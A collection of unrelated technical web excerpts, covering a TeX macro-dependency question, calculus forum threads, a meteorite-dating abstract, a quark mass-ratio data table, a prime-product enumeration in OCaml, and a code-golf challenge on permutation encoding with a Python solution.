$1/(1-q^h)$, $h\geq 1$, so will have nonnegative coefficients as desired. Thus we have not just an existence proof, but a precise generating function for the number of fathers of each shape.
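The small cases behind such counts can be brute-forced directly. The sketch below (Python, not part of the original exchange; all names are mine) enumerates every SSYT with entries summing to n, row by row, which is useful for checking the conjecture's ingredient counts for tiny N:

```python
def count_ssyt(n):
    """Brute-force count of semi-standard Young tableaux (weakly
    increasing rows, strictly increasing columns, positive integer
    entries) whose entries sum to n.  Only practical for small n."""

    def gen_rows(width, above, budget):
        # Weakly increasing rows of `width` cells; cell j must strictly
        # exceed above[j] (the cell directly above); row sum <= budget.
        def rec(j, prev, spent):
            if j == width:
                yield ()
                return
            lo = max(prev, above[j] + 1)
            for v in range(lo, budget - spent + 1):
                for rest in rec(j + 1, v, spent + v):
                    yield (v,) + rest
        yield from rec(0, 1, 0)

    def extend(above, budget):
        if budget == 0:   # all of n used up: one finished tableau
            return 1
        total = 0         # otherwise another row (no wider than `above`) is needed
        for width in range(1, len(above) + 1):
            for row in gen_rows(width, above, budget):
                total += extend(row, budget - sum(row))
        return total

    # Row 1 sits below a virtual row of zeros, of any width up to n.
    return extend((0,) * n, n)

print([count_ssyt(n) for n in range(1, 5)])  # [1, 2, 4, 7]
```

The first few values agree with a hand count of the tableaux of content-sum 1 through 4.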
|
|
Creating macro cross references
Is there any tool that allows me to analyze/see/display macro dependencies?
To be clear: After
\def\a{\b\c}
\def\b{\x\c}
I'd like to get that \a uses \b and \c and that \b uses \x and \c, best nicely displayed. And to make me entirely happy: the tool should also tell me that \a was defined in file X at line Y...
Slightly editing my answer to your other related question, Q: Loop over all tokens in the body of a macro.
\documentclass{article}
\usepackage[T1]{fontenc}
\usepackage{lmodern}
\let\enddependency\relax
\let\test\relax
\newcommand\dependency[1]{The macro \string#1 contains these dependencies:%
\expandafter\dependencyaux#1\enddependency\par}
\def\dependencyaux#1#2\enddependency{%
\ifcat\relax\noexpand#1 \string#1\fi
\ifx\enddependency#2\else\dependencyaux#2\enddependency\fi%
}
\begin{document}
\def\a{ blah \b de-blah-blah \c}
\def\b{\x{\c}}
\dependency{\a}
\dependency{\b}
\end{document}
|
|
# Math Help - Another solid of revolution, thanks
1. ## Another solid of revolution, thanks
I now have another problem, similar to my previously posted one, but I'm confused since I get a negative result, which is impossible; that means I have a mistake somewhere:
I have to find the solid of revolution by rotating about x axis the area bounded by y=sec(x) , y=1, x = -1 and x = 1;
the washer area would be $\pi(\sec^2(x) - 1)$ and the volume is the integral from $-1$ to $1$; how do I evaluate these x-values to integrate the function?
thanks
2. ## Re: Another solid of revolution, thanks
The region bounded by those curves is rather small! And the simplest way to find the volume rotated around the x-axis is to do it as two integrals. The volumes bounded above by y= sec(x), below by y= 0, on the left by x= -1, and on the right by x= 1, rotated around the x-axis, is $\pi\int_{-1}^1 sec^2(x) dx$. The volume bounded above by y= 1, below by y= 0, on the left by x= -1, and on the right by x= 1, rotated around the x-axis, is $\pi\int_{-1}^1dx= 2\pi$ (actually the volume of a cylinder with radius 1 and height 2). The volume you want is the difference between those two. That is the same as $\pi \int_{-1}^1 (sec^2(x)- 1) dx$.
That is based on the fact that the volume of a cylindrical "donut" with inner radius r, outer radius R, and height h, is $\pi(R^2- r^2)h$, which is the same as the volume of the whole cylinder, $\pi R^2h$, minus the volume of the inner cylinder, $\pi r^2h$.
3. ## Re: Another solid of revolution, thanks
Originally Posted by HallsofIvy
The region bounded by those curves is rather small! And the simplest way to find the volume rotated around the x-axis is to do it as two integrals. The volumes bounded above by y= sec(x), below by y= 0, on the left by x= -1, and on the right by x= 1, rotated around the x-axis, is $\pi\int_{-1}^1 sec^2(x) dx$. The volume bounded above by y= 1, below by y= 0, on the left by x= -1, and on the right by x= 1, rotated around the x-axis, is $\pi\int_{-1}^1dx= 2\pi$ (actually the volume of a cylinder with radius 1 and height 2). The volume you want is the difference between those two. That is the same as $\pi \int_{-1}^1 (sec^2(x)- 1) dx$.
That is based on the fact that the volume of a cylindrical "donut" with inner radius r, outer radius R, and height h, is $\pi(R^2- r^2)h$, which is the same as the volume of the whole cylinder, $\pi R^2h$, minus the volume of the inner cylinder, $\pi r^2h$.
and by solving this integral I did the following $\pi \int_{-1}^1 (sec^2(x)- 1) dx =$
$2\pi \int_{0}^{1} (sec^2(x)- 1) dx =$ by symmetry
$2\pi (tan(x) - x)_{0}^{1} =$ which gives me
$2\pi ( \frac{\pi}{4} - 1) =$ , which is negative... what am I doing wrong,
even if I evaluate the integral otherwise $\pi \int_{-1}^1 (sec^2(x)- 1) dx = \pi \int_{-1}^1 (tan^2(x)) dx$
which is $2\pi (tan(x) - x)_{0}^{1} =$ gives me the same results...
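A note outside the original thread: the antiderivative is evaluated at 1 radian, not at 45 degrees, and $\tan(1) \approx 1.557 > 1$, so the result is in fact positive. A quick numeric check:

```python
import math

# Volume = 2*pi*(tan(x) - x) evaluated from 0 to 1, with x in radians
volume = 2 * math.pi * (math.tan(1.0) - 1.0)
print(volume)  # about 3.50, a positive volume
```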
|
|
# LaTeX w00t!
Standard
I owe Professor Paul A. Rubin another apology – turns out I can display LaTeX natively in a wordpress.com blog after all – as the following wave equation shows:
$i\hbar\frac{\partial}{\partial t}\left|\Psi(t)\right>=H\left|\Psi(t)\right>$
## 2 thoughts on “LaTeX w00t!”
1. Just remember, the conversion rate is 2 apologies : 1 beer (imperial pint).
• Let me know when you are next in London, I always pay my debts.
|
|
## Applications of Integration: Force Due to Fluid Pressure
I'm working on a particular problem that involves the force on a face of a triangular prism. What I am wondering is if someone could explain how to find dA for the prism? If the prism is an equilateral triangle, then $dA=\sqrt3dy$ doesn't it? My book is showing that the area is $2\sqrt3ydy$ and I really cannot see how...
|
|
# The initial abundance and distribution of 92Nb in the Solar System
Tsuyoshi Iizuka, Yi-Jen Lai, Waheed Akram, Yuri Amelin, Maria Schönbächler
Earth and Planetary Science Letters
Available online 11 February 2016
doi:10.1016/j.epsl.2016.02.005
Updated: February 11, 2016
“Niobium-92 is an extinct proton-rich nuclide, which decays to 92Zr with a half-life of 37 Ma. This radionuclide potentially offers a unique opportunity to determine the timescales of early Solar System processes and the site(s) of nucleosynthesis for p-nuclei, once its initial abundance and distribution in the Solar System are well established. Here we present internal Nb-Zr isochrons for three basaltic achondrites with known U-Pb ages: the angrite NWA 4590, the eucrite Agoult, and the ungrouped achondrite Ibitira. Our results show that the relative Nb-Zr isochron ages of the three meteorites are consistent with the time intervals obtained from the Pb-Pb chronometer for pyroxene and plagioclase, indicating that 92Nb was homogeneously distributed among their source regions. The Nb-Zr and Pb-Pb data for NWA 4590 yield the most reliable and precise reference point for anchoring the Nb-Zr chronometer to the absolute timescale: an initial 92Nb/93Nb ratio of $(1.4 \pm 0.5) \times 10^{-5}$ at $4557.93 \pm 0.36$ Ma, which corresponds to a 92Nb/93Nb ratio of $(1.7 \pm 0.6) \times 10^{-5}$ at the time of the Solar System formation. On the basis of this new initial ratio, we demonstrate the capability of the Nb-Zr chronometer to date early Solar System objects including troilite and rutile, such as iron and stony-iron meteorites. Furthermore, we estimate a nucleosynthetic production ratio of 92Nb to the p-nucleus 92Mo between 0.0015 and 0.035. This production ratio, together with the solar abundances of other p-nuclei with similar masses, can be best explained if these light p-nuclei were primarily synthesized by photodisintegration reactions in Type Ia supernovae. ”
|
|
# ${\boldsymbol m}_{{{\boldsymbol u}}}/{\boldsymbol m}_{{{\boldsymbol d}}}$ MASS RATIO INSPIRE search
| VALUE | DOCUMENT ID | TECN | COMMENT |
| --- | --- | --- | --- |
| $\bf{0.48 {}^{+0.07}_{-0.08}}$ | OUR EVALUATION | | |
| $0.485 \pm0.011 \pm0.016$ | FODOR 2016 [1] | LATT | |
| $0.4482 {}^{+0.0173}_{-0.0206}$ | BASAK 2015 [2] | LATT | |
| $0.470 \pm0.056$ | CARRASCO 2014 [3] | LATT | |
| $0.698 \pm0.051$ | AOKI 2012 [4] | LATT | |
| $0.42 \pm0.01 \pm0.04$ | BAZAVOV 2010 [5] | LATT | |
| $0.4818 \pm0.0096 \pm0.0860$ | BLUM 2010 [6] | LATT | |
| $0.550 \pm0.031$ | BLUM 2007 [7] | LATT | |

• • • We do not use the following data for averages, fits, limits, etc. • • •

| VALUE | DOCUMENT ID | TECN | COMMENT |
| --- | --- | --- | --- |
| $0.43 \pm0.08$ | AUBIN 2004A [8] | LATT | |
| $0.410 \pm0.036$ | NELSON 2003 [9] | LATT | |
| $0.553 \pm0.043$ | LEUTWYLER 1996 [10] | THEO | Compilation |
1 FODOR 2016 is a lattice simulation with ${{\mathit N}_{{f}}}$ = 2 + 1 dynamical flavors and includes partially quenched QED effects.
2 BASAK 2015 is a lattice computation using 2+1 dynamical quark flavors.
3 CARRASCO 2014 is a lattice QCD computation of light quark masses using 2 + 1 + 1 dynamical quarks, with ${{\mathit m}_{{u}}}$ = ${{\mathit m}_{{d}}}{}\not=$ ${{\mathit m}_{{s}}}{}\not=$ ${{\mathit m}_{{c}}}$. The ${\mathit {\mathit u}}$ and ${\mathit {\mathit d}}$ quark masses are obtained separately by using the ${{\mathit K}}$ meson mass splittings and lattice results for the electromagnetic contributions.
4 AOKI 2012 is a lattice computation using 1 + 1 + 1 dynamical quark flavors.
5 BAZAVOV 2010 is a lattice computation using 2+1 dynamical quark flavors.
6 BLUM 2010 is a lattice computation using 2+1 dynamical quark flavors.
7 BLUM 2007 determine quark masses from the pseudoscalar meson masses using a QED plus QCD lattice computation with two dynamical quark flavors.
8 AUBIN 2004A perform three flavor dynamical lattice calculation of pseudoscalar meson masses, with continuum estimate of electromagnetic effects in the kaon masses.
9 NELSON 2003 computes coefficients in the order $\mathit p{}^{4}$ chiral Lagrangian using a lattice calculation with three dynamical flavors. The ratio ${\mathit m}_{{{\mathit u}}}/{\mathit m}_{{{\mathit d}}}$ is obtained by combining this with the chiral perturbation theory computation of the meson masses to order $\mathit p{}^{4}$.
10 LEUTWYLER 1996 uses a combined fit to ${{\mathit \eta}}$ $\rightarrow$ 3 ${{\mathit \pi}}$ and ${{\mathit \psi}^{\,'}}$ $\rightarrow$ ${{\mathit J / \psi}}$ (${{\mathit \pi}},{{\mathit \eta}}$) decay rates, and the electromagnetic mass differences of the ${{\mathit \pi}}$ and ${{\mathit K}}$.
References:
FODOR 2016
PRL 117 082001 Up and Down Quark Masses and Corrections to Dashen's Theorem from Lattice QCD and Quenched QED
BASAK 2015
JPCS 640 012052 Electromagnetic Effects on the Light Hadron Spectrum
CARRASCO 2014
NP B887 19 Up, Down, Strange and Charm Quark Masses with $\mathit N_{f}$ = 2+1+1 Twisted Mass Lattice QCD
AOKI 2012
PR D86 034507 1+1+1 Flavor QCD + QED Simulation at the Physical Point
BAZAVOV 2010
RMP 82 1349 Full Nonperturbative QCD Simulations with 2+1 Flavors of Improved Staggered Quarks
BLUM 2010
PR D82 094508 Electromagnetic Mass Splittings of the Low Lying Hadrons and Quark Masses from 2+1 Flavor Lattice QCD+QED
BLUM 2007
PR D76 114508 Determination of Light Quark Masses from the Electromagnetic Splitting of Pseudoscalar Meson Masses Computed with Two Flavors of Domain Wall Fermions
AUBIN 2004A
PR D70 114501 Light Pseudoscalar Decay Constants, Quark Masses, and Low Energy Constants from three-flavor Lattice QCD
NELSON 2003
PRL 90 021601 Up Quark Mass in Lattice QCD with Three Light Dynamical Quarks and Implications for Strong $\mathit CP$ Invariance
LEUTWYLER 1996
PL B378 313 The Ratios of the Light Quark Masses
|
|
# Last three numbers of multiple of four primes
Suppose we have four two-digit prime numbers $$p_1$$, $$p_2$$, $$p_3$$ and $$p_4$$ such that they all end in a different digit, for example 11, 13, 17 and 19. What can the last three digits of $$p_1p_2p_3p_4$$ be? It is pretty obvious that the last digit has to be $$9$$, since $$1\cdot3\cdot7\cdot9 \equiv 9$$ (mod $$10$$), but I have a tough time figuring out what this product can be mod $$1000$$.
• There are only a few two-digit prime numbers. – Dietrich Burde Apr 14 at 18:51
• By my count there are $750$ possible products. Can you enumerate them? – Oscar Lanzi Apr 14 at 22:47
Here is a program in OCaml that I think checks it:
(* two-digit primes grouped by final digit: 1, 3, 7, 9 *)
let whatweneed = [[11;31;41;61;71];[13;23;43;53;73;83];[17;37;47;67;97];[19;29;59;79;89]]
(* prepend each element of l1 to each list in l2 *)
let rec appendele l1 l2 =
  match l1 with
  | q::w -> (List.map (fun x -> q::x) l2) @ (appendele w l2)
  | [] -> []
(* all ways of picking one element from each group *)
let rec oneineach ss =
  match ss with
  | q::w -> appendele q (oneineach w)
  | _ -> [[]]
let combinations = oneineach whatweneed
(* product of each selection, reduced mod 1000 *)
let multall = List.map (fun y -> List.fold_left (fun acc x -> acc * x) 1 y) combinations
let multallmodthousand = List.map (fun x -> x mod 1000) multall
let rec removeDuplicates lst =
  match lst with
  | [] -> []
  | x :: xs -> x :: (List.filter (fun u -> not (u = x)) (removeDuplicates xs))
let finalresult = removeDuplicates multallmodthousand
Here are the results:
$$[189; 499; 429; 49; 359; 529; 439; 169; 989; 899; 699; 909; 539; 959; 39; 849; 279; 709; 549; 259; 389; 809; 519; 719; 729; 759; 779; 789; 859; 469; 299; 129; 929; 839; 569; 69; 579; 109; 639; 689; 919; 739; 149; 419; 239; 649; 559; 589; 629; 249; 769; 979; 599; 409; 309; 749; 969; 79; 819; 619; 659; 679; 159; 509; 369; 879; 939; 949; 489; 219; 229; 289; 89; 269; 99; 319; 209; 339; 19; 29; 59; 139; 479; 669; 329; 999; 829; 349; 399; 199; 459; 889; 799; 9; 379; 449; 869; 119; 609; 179]$$
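As a cross-check outside the original post, the same enumeration takes a few lines of Python; it confirms that the 100 residues above are exactly all residues mod 1000 ending in 9:

```python
from itertools import product

# the same two-digit primes, grouped by last digit
groups = [[11, 31, 41, 61, 71],
          [13, 23, 43, 53, 73, 83],
          [17, 37, 47, 67, 97],
          [19, 29, 59, 79, 89]]

residues = {a * b * c * d % 1000 for a, b, c, d in product(*groups)}
print(len(residues))  # 100
```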
|
|
# Is it possible that in a metric space $(X, d)$ with more than one point, the only open sets are $X$ and $\emptyset$?
Is it possible that in a metric space $(X, d)$ with more than one point, the only open sets are $X$ and $\emptyset$?
I don't think this is possible in $\mathbb{R}$, but are there any possible metric spaces where that would be true?
-
One of the axioms is that for $x, y \in X$ we have $d(x, y) = 0$ if and only if $x = y$. So if you have two distinct points, you should be able to find an open ball around one of them that does not contain the other.
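Written out, the standard argument is short (a sketch filling in the step the answer alludes to):

```latex
Given $x \neq y$, set $r = d(x,y) > 0$. Then
\[
  B(x,r) = \{\, z \in X : d(x,z) < r \,\}
\]
is open, contains $x$, and excludes $y$ (because $d(x,y) = r \not< r$).
Hence $B(x,r)$ is an open set that is neither $\emptyset$ nor $X$.
```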
-
Extend this a little further and you've proved metric spaces are Hausdorff. – dls Nov 30 '11 at 19:55
Thanks, that's awesome! How can you be sure that such an open set exists in all metric spaces? What if the open ball around x must include other elements, and the sum of those open balls must go back to X? – dhz Nov 30 '11 at 20:01
@dhz Open balls come with every metric space -- they're how you define the (base for the) topology! – Dylan Moreland Nov 30 '11 at 20:03
@DylanMoreland What I meant was, how can you be sure that such an open set exists in all metric spaces of more than one element? What if the open ball around x must include other elements, an the sum of those open balls add back to X? Not sure if that makes sense, but basically I'm having trouble going from ball B to open subset U. – dhz Nov 30 '11 at 20:08
@dhz Hm. I'm not sure what you mean. Of course, it may be, as in $\mathbf{R}$, that every open ball contains more than one element. But these sets of the form $B(x, r) = \{y \in X : d(x, y) < r\}$ are always open. – Dylan Moreland Nov 30 '11 at 20:12
|
|
Library to convert co-ordinates between the (UK) Ordnance Survey National Grid and latitude/longitude
## Description
This package allows the user to manipulate co-ordinates on the Earth's surface in the two major co-ordinate systems: latitude / longitude, measured in degrees, and cartographic systems, measured in eastings and northings, based on a local ellipsoidal approximation to the Earth's geoid.
In particular, it provides tools for processing coordinates (of the form AB 12345 12345) based on the National Grid, defined by the UK Ordnance Survey. For more information, see the Ordnance Survey’s National Grid FAQ page.
The package provides basic functions to convert latitude / longitude to the National Grid and vice versa. However, underneath this is a comprehensive system for mapping, and transforming between different co-ordinate systems, including those for the UK, the Republic of Ireland, France, North America, and Japan.
## Simple Conversion
OSGridConverter.latlong2grid(latitude, longitude, tag='WGS84')
Converts from latitude / longitude to an OS Grid Reference.
latitude:
The latitude of the point, expressed in decimal degrees North
longitude:
The longitude of the point, expressed in decimal degrees East
tag:
The name of the datum used in the conversion; default is WGS84, referring to the standard datum used by Ordnance Survey
Return value is an OSGridReference object. For the purpose of simple conversions, what matters is that, if g is such an object, then g.E and g.N are respectively its easting and northing, expressed in metres, and str(g) returns the formatted National Grid reference.
Example:
>>> from OSGridConverter import latlong2grid
>>> g=latlong2grid(52.657977,1.716038)
>>> (g.E,g.N)
(651408, 313177)
>>> str(g)
'TG 51408 13177'
OSGridConverter.grid2latlong(grid, tag='WGS84')
Converts from an OS Grid Reference to latitude / longitude.
grid:
The point to be converted. Either an OSGridReference object, or a string formatted as an Ordnance Survey grid reference, e.g. ‘TG 51408 13177’
tag:
The name of the mapping datum used in the conversion; default is WGS84, referring to the standard datum used by Ordnance Survey
Return value is a LatLong object. For the purpose of simple conversions, what matters is that, if l is such an object, then l.latitude is its latitude expressed in decimal degrees North, and l.longitude is its longitude expressed in decimal degrees East.
Example:
>>> from OSGridConverter import grid2latlong
>>> l=grid2latlong('TG 51408 13177')
>>> (l.latitude,l.longitude)
(52.65798005789814, 1.7200761111093394)
OSGridConverter.Tags
A list of strings: names of the standard mapping datums that the package is aware of and can convert between. Its members are the valid values that can be used in the tag field of the conversion functions.
| Tag | Details |
| --- | --- |
| WGS84 | UK |
| OSGB36 | Former UK standard (replaced by WGS84) |
| ED50 | UK; used for oil and gas exploration |
| Irl1975 | Republic of Ireland |
| NTF | France |
| TokyoJapan | Japan |
| | North America; very similar to WGS84 |
Note
Conversion from lat / long to grid and then back to lat / long generally does not end up with the original values. This is due to a combination of internal rounding errors, plus the fact that the National Grid resolves points to 10m x 10m squares. In the examples above, the before and after latitudes differ by approx. 1.0e-5 and the longitudes by approx. 3.0e-3; this is typical.
|
|
Question
# An electron is moving in a circular path of radius $5.1\times10^{-11}$ m at a frequency of $6.8\times10^{15}$ revolutions/sec. The equivalent current is approximately equal to _______.
- $5.1\times10^{-3}$ A
- $1.1\times10^{-3}$ A
- $6.8\times10^{-3}$ A
- $2.2\times10^{-3}$ A
Solution
## The correct option is B: $1.1\times10^{-3}$ A. Given the frequency $\nu = 6.8\times10^{15}$ rev/s, the period is $T = 1/\nu = 1/(6.8\times10^{15})$ s. The current is $i = Q/T = Q\nu = 1.6\times10^{-19}\times6.8\times10^{15} \approx 1.1\times10^{-3}$ A.
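The arithmetic can be sketched in two lines (values as given in the problem; each revolution carries one electron charge past any fixed point on the orbit):

```python
e = 1.6e-19  # elementary charge in coulombs
f = 6.8e15   # orbital frequency: revolutions per second

# Equivalent current: charge passing a fixed point per second, i = Q/T = Q*f
i = e * f
print(i)  # about 1.1e-3 A
```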
|
|
# Add JS lib function call and store blocks
Efficiency goes pretty downhill when you need to generate new custom JS functions every time you run them. You could store them in variables (lists) or the global space, but I believe this is a better option. Allow people to have some sort of "auto execute" when importing libraries or making one (or just do it in an import block, requiring that it is run first). This would be used to create the functions and store them by name in some library namespace. Then allow those functions to be called both in JS (libname.func...) and from a block, without needing to create new functions each time. This matters especially because, even if the functions were stored in the global namespace, another JS function would need to be used to perform a call. This is also a better alternative to polluting sprite variable namespaces.
That's an interesting idea. But what I want to do, a more general solution, is have a block that defines a block:
or something like that. Then the script input could be a JS Function or anything else.
But I see your point that if it's a JS Function it should be callable from JS without going through the JS Function block each time. So maybe a DEFINE JS block that's a cross between my DEFINE and the existing JS Function.
We're reluctant to do auto execute because it means you're running someone else's JS code without a chance to examine it. Maybe as a special case for official libraries.
As for auto-exec, you can just prompt the user when the library is imported.
Also yes but what I had in mind was more like this:
|new library [name]|
|define [funcname] for [libraryname] as [jsfunction]|
(call [funcname] from [libraryname] [inputs]...>)
|run [funcname] from [libraryname] [inputs]...>|
The library could potentially be inspected from the last call as well (being replaced if using new library with the same name)
I see. The idea of using the library name at runtime is orthogonal to everything else; we could do it for Snap! procedures too. But we haven't felt the need for a module system so far; could you say more about why that part is important?
It's mostly for a few reasons:
1. Efficiency is improved by providing a way to store constant functions and call them instead of making new ones each time
2. Readability is improved as all the inlined functions would be replaced by calls within the block definitions
4. Ability to use the paired function from a block or from JS itself.
5. Functions will associate to libraries and have less chance of collisions than if set up the aforementioned ways. They will also be "named," allowing for potential drop-down menus that might show the comment when hovering and allow for easy access (could even select based on the library name). The drop-down could select both the library name and function name as well when empty.
6. Other libraries may be imported (when required and imported alongside the library) and it should not cause issues with loading the libraries.
Okay, your #5 answers the question. Sigh. We've really been resisting turning Snap! into a heavy-duty industrial language. Dan Garcia wants us to enforce type declarations; you want modules; pretty soon someone will ask for interface templates. I see why an industrial language such as Java needs all those things, but we cherish the idea that an 8-year-old can come to Snap! and start hacking away without the weight of notation to cope with. So the question is how to give you grownups what you want without it getting in kids' faces. I'm proud of how we designed lambda for Snap!, but it took us three tries to get it right.
Anyway, we'll put this on the discussion list, but I'd be happier if you wrote a library we could publish. That's one way to keep industrial-strength features out of kids' faces.
Yeah, I understand that this isn't something like Roblox, where the target development audience is more teenagers, but this would just allow Snap! to be more useful and run better. I was using this in a few of my projects, which are still about learning how to code rather than using Snap! for professional purposes. A good example is a Discord library I was working on for a while, where you could interact with webhooks and bots in simple ways.
But the main issues are with clutter and performance problems, things that these new blocks would alleviate (I can show you the crazy source for some of these blocks). They should not be difficult for children to understand, as they would not need to see the inner workings unless they want to know how things work. The library stuff should be non-obtrusive, used only within the custom blocks provided by the library.
On a side note, it would be great if the custom blocks could be categorized in some way either by library or by editing its properties so that they are more well sorted and displayed.
Oh, I see! The library would "publish" blocks that don't have the module name attached. That could work.
By the way, our preference is to construct data structures functionally:
And even if they did see the block source, it will be a bunch of simple function calls with proper naming. If they want to see the library function source they can go and look it up.
The message object internally is a JS dictionary that gets a lot of casting, conversion, and modification done, but it would be easier to explain if the functions were just named. Especially since there are some blocks I make only for library purposes, so I don't have to repeat myself in code, and they clutter the environment.
Also, sure, I guess there could be ways to define blocks using JS sources directly, but I believe that would be more complicated and still create a bunch of blocks that would inevitably be imported. These "libraries" or "modules" would reduce the clutter greatly because they won't create a huge list of blocks; they would just be part of the library namespace. It's the difference between making a bunch of functions within a JS file and then trying to write code with all those functions in the way vs. importing a module where the functions live only within the module and can be looked up when needed.
A lot of my blocks use other blocks I've created, like helpers, as I've stated before, so there are dozens of blocks that the developer will never have to use. There is also the readability, which is hard to describe without sending source (I am on mobile and Snap! has really bad mobile support, so I can't open it).
Although JS-coded blocks would still be a nice feature, I just believe that this library setup would be more useful, especially for "hiding" implementation in a way where it's easily accessible but not obtrusive.
Okay, I get it. I can't promise that we'll do anything about it any time soon--we have plenty of missing features already on the list.
OK. If I had any time aside from other personal projects, I would probably just try to make the block myself as a pull request, but it would take too long to figure out.
|
|
matplotlib.pyplot.matshow¶
matplotlib.pyplot.matshow(A, fignum=None, **kwargs)[source]
Display an array as a matrix in a new figure window.
The origin is set at the upper left hand corner and rows (first dimension of the array) are displayed horizontally. The aspect ratio of the figure window is that of the array, unless this would make an excessively short or narrow figure.
Tick labels for the xaxis are placed on top.
Parameters:
- **A** (array-like, shape (M, N)): The matrix to be displayed.
- **fignum** (None or int or False): If None, create a new figure window with automatic numbering. If a nonzero integer, draw into the figure with the given number (create it if it does not exist). If 0, use the current axes (or create one if it does not exist). Note: because of how Axes.matshow tries to set the figure aspect ratio to be the one of the array, strange things may happen if you reuse an existing figure.

Returns: AxesImage

Other Parameters: `**kwargs` (imshow arguments)
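A minimal usage sketch (the array, the headless backend choice, and the filename are illustrative, not from the docs):

```python
import matplotlib
matplotlib.use("Agg")            # non-interactive backend, suitable for scripts
import matplotlib.pyplot as plt
import numpy as np

a = np.diag(range(15))           # a 15x15 matrix with 0..14 on the diagonal
im = plt.matshow(a)              # new figure; origin at the upper left
plt.savefig("matshow_demo.png")  # illustrative output filename
```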
|
|
# Permutation Encoding
Write a program which can encode text to avoid reusing characters, and convert back.
Both normal and encoded forms are restricted to a particular character set: the space character with code point 32, the tilde character ~ with code point 126, and all characters between. This is 95 total characters. It's a printable subset of ASCII.
The encoded text can be up to 95 characters long. The normal text can be up to 75 characters long, because above 75 it would be impossible to uniquely encode all messages.
## Encoding
There are some requirements for the encoding:
• Uses only characters from the character set described above
• Uses each character at most once
• Uniquely encodes all valid messages
Other than that, you're free to pick any variant.
## Input
Input will consist of 2 items:
• A boolean: false to encode, true to decode
• A string: the message to be encoded/decoded
How you receive the input is up to you.
The boolean can be as a boolean or integer in the range [-2, 2] in your language's format. If the esoteric language doesn't have booleans or integers, use the closest analogue. I'm not doing the "or any 2 distinct values" because then you could use an encoding and decoding program as the values and evaluate them.
## Output
Output should consist of only the encoded/decoded string. Leading and trailing newlines are okay.
## Scoring
This is code golf, so the shortest program in bytes wins. I still encourage you to try harder languages even if they won't win.
## Testing
Testing will generally be done with Try it Online!. For convenience, please provide a link to your program with some test input already filled in.
These are the steps to test a program:
• Pick a valid normal string.
• Encode it using the program.
• Check that the encoded form is valid.
• Decode it using the program.
• Check that the final result matches the original string.
This can be repeated with other test strings for confidence.
If you show a working case and no failing cases have been found, we will assume your program works.
# Reference Implementation
I am providing a reference implementation that shows one possible method, in hopes of making this problem more approachable. I used it to generate the examples. I recommend you try the problem yourself before looking at how I did it, that way you may independently come up with a better mapping.
# Examples
Since you can choose a different encoding, as well as different input/output methods, your program might not match these examples.
## Empty
Input:
0
Output:
(none)
Input:
1
Output:
(none)
## Small
Input:
0
Hello, world!
Output:
#mvcD_YnEeX5?
Input:
1
#mvcD_YnEeX5?
Output:
Hello, world!
## Max Size
Input:
0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Output:
C-,y=6Js?3TOISp+975zk}.cwV|{iDjKmd[:/]$Q1~G8vAneoh #&<LYMPNZB_x;2l*r^(4E'tbU@q>a!\WHuRFg0"f%X)
Input:
1
C-,y=6Js?3TOISp+975zk}.cwV|{iDjKmd[:/]$Q1~G8vAneoh #&<LYMPNZB_x;2l*r^(4E'tbU@q>a!\WHuRFg0"f%X)
Output:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Extras
How did I get the 75-character limit? I could have brute-force checked it, of course, but there's a slightly more mathematical method for counting the number of possible encoded messages for a given character set:
$$F(n)=\sum_{k=0}^{n}{\frac{n!}{(n-k)!}}=e\Gamma(n+1,1)\approx en!$$
Here are the relevant bounds. There's plenty more valid encoded messages than normal messages, but still enough normal messages that you'll need a variable length encoding.
$$F(95)\approx 2.81\times 10^{148} \\ {95}^{75}\approx 2.13\times 10^{148} \\ 95!\approx 1.03\times 10^{148}$$
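These bounds are easy to verify exactly with integer arithmetic; a quick sketch (mine, not part of the challenge):

```python
from math import factorial

def F(n):
    # Strings (including the empty one) over an n-character alphabet that
    # use each character at most once: sum over lengths k of n!/(n-k)!.
    return sum(factorial(n) // factorial(n - k) for k in range(n + 1))

def normal(L):
    # Number of unrestricted strings over 95 characters of length <= L.
    return sum(95 ** k for k in range(L + 1))

assert F(2) == 5              # "", "a", "b", "ab", "ba"
assert F(95) > normal(75)     # every message up to 75 chars can be encoded
assert F(95) < normal(76)     # ...but length 76 would be impossible
```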
The problem was inspired by a phenomenon on the Discord chat platform. In Discord, you can "react" to chat messages, which adds a little emoji underneath. You can react many times on a single chat message. Each emoji can only be added once. They remember the order they were added and display oldest to newest, left to right. You can add some non-emojis too. People sometimes write short messages in reactions, and when their message has repeat characters they're forced to get creative, usually they opt for lookalike characters.
• Welcome to PPCG! Great first challenge! Here's a link to the Tour if you haven't seen it, and the Sandbox where you can get challenges reviewed before posting. – pizzapants184 Sep 3 '18 at 10:09
• Do we really need to use TIO? If so, then it sounds very restricting. – Erik the Outgolfer Sep 3 '18 at 15:30
• I ask for a link to some online compiler/interpreter since it makes it convenient for others to test. It doesn't have to be TIO. If you don't link at all, it will be frustrating trying to test your submission, it's hard to tell if the submission doesn't work or we're just running it wrong. – EPICI Sep 3 '18 at 16:31
# Python 3, ~~339~~ 338 bytes
lambda b,s:b and G(f(s))or F(g(s))
a=''.join(chr(32+i)for i in range(95))
f=lambda s:95*f(s[1:])+ord(s[0])-31if s else 0
F=lambda n:chr((n-1)%95+32)+F((n-1)//95)if n else ''
g=lambda s,d=a:1+d.find(s[0])+len(d)*g(s[1:],d.replace(s[0],''))if s else 0
G=lambda n,d=a:d[(n-1)%len(d)]+G((n-1)//len(d),d.replace(d[(n-1)%len(d)],''))if n else''
Try it online!
Same length, uses a list instead of a string for the ASCII chars Try it online!.
Overview: WIP
• Because the number of printable ASCII strings with 75 or fewer characters is 21570794844237986466892014672640809417999612393958961235356099871415520891159490775110725336452276983325050565474469409911975201387750975629116626495, which is less than the number of valid encoded strings (28079792812953073919740255779032193344167751681188124122118245935431845577725060598682278885127314791932249387894125026034584206856782082066829102875)
• All we need to do is theoretically sort the valid encoded strings and the valid non-encoded strings, take the index in the correct list of our given input, then return the string at that index in the other list.
• f: Converts an input (non-encoded) string to an integer based on its index in the theoretical list of ASCII strings sorted by length and then lexicographically.
• The empty string is 0
• Single-char strings are 1 to 95
• Two-char strings are 96 to 9120, etc.
• F: Undoes f, converts an integer to a (non-encoded) string.
• g: Converts an input (encoded) string to an integer (<= 28079792812953073919740255779032193344167751681188124122118245935431845577725060598682278885127314791932249387894125026034584206856782082066829102875 for valid inputs) based on its index in the theoretical list of valid encoded strings sorted by length and then lexicographically.
• The empty string is 0
